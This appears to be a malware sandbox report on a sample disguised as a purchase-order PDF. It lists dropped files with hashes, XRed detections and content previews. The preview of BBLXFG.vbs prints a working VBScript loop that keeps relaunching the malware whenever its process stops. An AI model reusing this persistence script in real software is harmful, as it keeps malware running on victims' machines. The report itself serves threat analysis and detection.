                                                                                                                      SHA1:2C417EB3E4CBBF7DD9D8498321C3C02BCBFCFCD8
                                                                                                                      SHA-256:EC25627B92CA7E956151E4C1A0C958D4C909C5267FCA609C3D5F5A949711D11B
                                                                                                                      SHA-512:935B1B28754DD359D44983247572CFC899DC3AC083A5F5D90CB079A0FAB7750C9A2552A95D02EA96CC694AF4EA6F60E8A1DB0A9E50D376E1CCCF5FB22396961B
                                                                                                                      Malicious:false
                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.5.0.8.<./.P.i.

                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER2594.tmp.xml

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):4590
                                                                                                                      Entropy (8bit):4.463117864307901
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:cvIwWl8zsTJg77aI9MfWpW8VYH8PYm8M4JFJF3I+q8nRc5Z3d:uIjftI7uO7VU8SJdIwmZ3d
                                                                                                                      MD5:AD29374BA4F86AF783CDECA5EF3AF16D
                                                                                                                      SHA1:9356B56C3D4FCF6A2C09863B86A75C3A433303A1
                                                                                                                      SHA-256:A5C9C78CF6B81E10DB1FD0E2AFEFBB325712BC4734ABF101C6CC68AB6AE399C2
                                                                                                                      SHA-512:FF2DF05A90DFCC24EFBD98AB1F40EF648BB0E1BB9C710AA9C989BB42A1D4C14A514116D92AFCA278C3C418D6646441E90AB1F7EAA6FFAC245CE41ED5164A6CE7
                                                                                                                      Malicious:false
                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653863" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERF5A.tmp.dmp

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Mon Dec 30 10:41:10 2024, 0x1205a4 type
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2717294
                                                                                                                      Entropy (8bit):2.2991752341014706
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:gnWb18d5okAENrzuZbZv1E6yRJOH4k4R6DM4RrN:gnWh8DlyHOk4R6zR
                                                                                                                      MD5:BFB9B5AF2C2F5745A2BBA6DF553D824C
                                                                                                                      SHA1:A349F189F300E6F52692821A18AB4957EBBA98AB
                                                                                                                      SHA-256:8F21430D9732FFE2A067A68F736E93409F984BB31AE97FDAB3FDEC4BB33D7C49
                                                                                                                      SHA-512:FAC7DE1288DD839A5E57C93AB5A51A2CB35E66C36DCE9ED74C5950873E1C407E988A0EA122C224DF0F0077DDD7F7EA44899991CF84FFEB7EF9066409402A0D96
                                                                                                                      Malicious:false
                                                                                                                      Preview:MDMP..a..... ........xrg.............9...............A......$....`......................`.......8...........T............[..V.(..........`...........b..............................................................................eJ......Xc......GenuineIntel............T............xrg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\ProgramData\Synaptics\RCX6FCE.tmp

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:modified
                                                                                                                      Size (bytes):771584
                                                                                                                      Entropy (8bit):6.638013190381294
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ICXr:ansJ39LyjbJkQFMhmC+6GD9x
                                                                                                                      MD5:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                      SHA1:6C2BAA72EA5D08B6583893B01001E540213F4AAF
                                                                                                                      SHA-256:449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                                                                                                                      SHA-512:DA806BD4AC02C45C17ED5D050428B3E7B15E8F148ACB156CFB41EAB3E27C35FA91AB1A55D18C6EF488A82D3379ABF45421432E2EFAF2FAE4968C760D42215A7C
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCX6FCE.tmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCX6FCE.tmp, Author: Joe Security
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                      Joe Sandbox View:
                                                                                                                      • Filename: Purchase-Order.exe, Detection: malicious, Browse
                                                                                                                      • Filename: hoaiuy.msi, Detection: malicious, Browse
                                                                                                                      • Filename: 222.msi, Detection: malicious, Browse
                                                                                                                      • Filename: Machine-PO.exe, Detection: malicious, Browse
                                                                                                                      • Filename: 222.exe, Detection: malicious, Browse
                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                      C:\ProgramData\Synaptics\Synaptics.exe

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2203648
                                                                                                                      Entropy (8bit):7.056405744702409
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:ZnsHyjtk2MYC5GDqkwkn9IMHea2A07SXq6zMaPCSO:Znsmtk2acdnV+FSvPCt
                                                                                                                      MD5:38D3095D1B748CD53C65395718D7C5F4
                                                                                                                      SHA1:3C0221471B641A641A9141A731F6EE09663E6538
                                                                                                                      SHA-256:F3724BF49BFD8D11EF1F81B4C6AEBC4D3281CECFA357D4FB3AE388A4ADD242E6
                                                                                                                      SHA-512:F0AB6ED5DFA52D8159C5090FD96087BA8E89C26C2FDB90FAE3F4D19B6952250ECD49846B9198D7C77AFFB6FABE3A0E53758392409A73552B202591433AFC03E6
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................."..................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................

                                                                                                                      C:\ProgramData\Synaptics\Synaptics.exe:Zone.Identifier

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):26
                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                      Malicious:true
                                                                                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                      C:\Users\user\AppData\Local\Temp\14mCSyw.ini

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.262057842376339
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0Z7SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+O+pAZewRDK4mW
                                                                                                                      MD5:A3CBB6BFA8826BCB73DDF8F8BF67BDF6
                                                                                                                      SHA1:0D01E28DFFF556551C6AC7F63B1226A62A22F868
                                                                                                                      SHA-256:F2D2123B0AA8A1B26CC031B6D6438C9DB37DC7D0CB2CEB29412C7CBB45BC91BE
                                                                                                                      SHA-512:FA458FFA551E54B8043FD4CC71D00A191353AFC083D6C9C6B94B608851AA19ECFDD23506D58B862F5136C19CCCD163276A83837DC0E4AA6232F66211EA2F6AA3
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="N5DpkcM40-KmD2OG604_uQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                      C:\Users\user\AppData\Local\Temp\6Ff1EvW.ini

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.249483813062525
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0nfSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+o+pAZewRDK4mW
                                                                                                                      MD5:6F00C01AEF644E4DC9CF7A4DE8D64666
                                                                                                                      SHA1:C60118AD60C3078F21C8A4D0751A6B520311E7D0
                                                                                                                      SHA-256:A0B5613EACE9E7A0347769691D4BCC3C3B1AAFD4463AEC3817AB68EC1DDB187A
                                                                                                                      SHA-512:000E69E9092A8C40E92C5A2FED30EAB4F56220378E801E6F08D827DE6CEB5081B2F77250AE00504D2B14C8552178E786D5231F48FA8986FB2A2B11225FCC21F8
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="oGbJXCH8x5p-s1tcTMp1ag">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                      C:\Users\user\AppData\Local\Temp\6eip22m.ini

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.267407542534121
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0QSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+z+pAZewRDK4mW
                                                                                                                      MD5:EC6F455B08F19D978733D212AA118BBF
                                                                                                                      SHA1:60445A3BA9FEB15C8C61FAEF147E95B763CB4106
                                                                                                                      SHA-256:39AFFD236501C4AA3304B8F1EFE476548404F09AF7181D94FB18CEF9F56202DD
                                                                                                                      SHA-512:13F9688A753F5CE8763ED0049C14AB48042B1DC2FFC890476ECA8EC9E750CD4CC7C536FE6AE42A8B2C70080697792A44B3BDBAD916DD59164E2A631B791F7F6B
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cQPVQOEVo8vKV9GkyDop0w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                      C:\Users\user\AppData\Local\Temp\7dB2Cii.ini

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.2518032455403985
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+06Q1SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+JQ1+pAZewRDK4mW
                                                                                                                      MD5:1C11BDA248185C5C711228B2CFCBA1F6
                                                                                                                      SHA1:468D7A0EF60BDF48FC6398BFA6974B7578DDB5F6
                                                                                                                      SHA-256:95721DEB1C768CEB39E56E7E51982ECF2262E8876E3C4936BA30C9BF8D8BB717
                                                                                                                      SHA-512:4D61AE82C2F07D72643B426C9F3E5DDD1666FD111C76DB4A5400813DE00F4482F9A678E111E684929151AB68F04DC31C81F58679D04E3870A0AB564373B6EFE4
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="XrVx1wVP_Gno1a-Qbv1k0A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                      C:\Users\user\AppData\Local\Temp\BBLXFG.vbs

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:modified
                                                                                                                      Size (bytes):892
                                                                                                                      Entropy (8bit):5.412546740664526
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:dF/UFy/uPU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UFgt+G+7xLxe0WABNVIqZaVzgA
                                                                                                                      MD5:C7A5EF361A994FF9FB96426ABA42D6FB
                                                                                                                      SHA1:8D11144A059F38AC646F2CA1A1AB2D3148261A12
                                                                                                                      SHA-256:0F9C917A9C1A2DDE96F396EDF6632D7465017231E2244EB373D8BAAC8D81B14E
                                                                                                                      SHA-512:BDFC31623D7B8B4CF62039600929B1D67BD35529CB14885A21A29B159C6E5E871E741E53E1A0837CC4073CABBA2053F888E494F32598054BF0D0AEB87D1408EA
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, Author: Joe Security
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      Preview:On error resume next..Dim strComputer,strProcess,fileset..strProcess = "._cache_New PO - Supplier 16-12-2024-Pdf.exe"..fileset = """C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION

                                                                                                                      C:\Users\user\AppData\Local\Temp\BdSjlIL.ini

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.271764137257545
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0anDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+JD+pAZewRDK4mW
                                                                                                                      MD5:50BEE30D3CC6B6C11DF74E8D848AD43C
                                                                                                                      SHA1:49C3D8AF0A8E49A5B3E62C60C3812F1F5DF1E41F
                                                                                                                      SHA-256:3072E3E28E40FA526471C9E8BC1AB3E80D4AAD571018CE21358F89A846CCC587
                                                                                                                      SHA-512:3BA3A09ABD9A4B30BE808AC34AC7DFB781581D9502A8A2D715962C56D4AB79DE7C35D46A48DA026D1AD2BD45D90F94ABD908F2E58094BC24429D4ED488A00FB4
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TQ5YLAh4Ms-3JGTaBTB9Ow">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                      C:\Users\user\AppData\Local\Temp\CjGS2L3.ini

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.2773868830826185
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0lqXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Eo+pAZewRDK4mW
                                                                                                                      MD5:6CF508D00B8112C8661D11EC725BBB28
                                                                                                                      SHA1:A59848A5190A7C08D3289BDB318F16836DDB762E
                                                                                                                      SHA-256:1411A6E9EF5A550E8979E2C46611B2754B357BC250248B77575395280A09FEF2
                                                                                                                      SHA-512:9888FDA7794B1A06EF889DD303E43461E2ED369CC88AB5ADA7B8E99DE96DB0D2236241020574588684BA61B9358D16562A5C3E5D81A3DE981F48BB5E2FA54B48
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BU5FIPNGp7BrOVMKOTRByg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                      C:\Users\user\AppData\Local\Temp\CsbaKCz.ini

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.264746037260788
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0nSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+A+pAZewRDK4mW
                                                                                                                      MD5:E20BB8A0A50D0AEE789A5FE55F2C7A3A
                                                                                                                      SHA1:AD310D82EBE9347D87F4410DB2CD8C2F2F4452F3
                                                                                                                      SHA-256:2F7B81BBD7B5DA43F5F914AD07F3978925EA38CBBB9D71EA0D479B03BB4F6FCB
                                                                                                                      SHA-512:A0C47E599F0FAC8FC0769B82804BB032A74F2E1602963F4390E4EE9B10A49CC38FCC8894A2E47400DAE0413B0A3329F4CBE65AC474AC5DC8B4552F68CEB2174D
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="U_XsjNBv7NPiUsWbiK6i0w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                      C:\Users\user\AppData\Local\Temp\DxmHXdr.ini

                                                                                                                      Download File
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.260119238066125
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+08f3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Zf3+pAZewRDK4mW
                                                                                                                      MD5:83E0141767DAF1A7325CC946061976C2
                                                                                                                      SHA1:5E5F48E051265101626872264F3496B1D36F5DA6
                                                                                                                      SHA-256:7FBB126D63BD8687992A67D8131B1CD91FAE585591A5FA7692E573C002DB0126
                                                                                                                      SHA-512:F782EF5DBDC9DC828826371C650516BF6FE45D414E47F497200C83FACA1A99AFB9405419185B6EA6355A701A5C5509EE5871C0002239E81317BF39B15E7F252F
                                                                                                                      Malicious:false
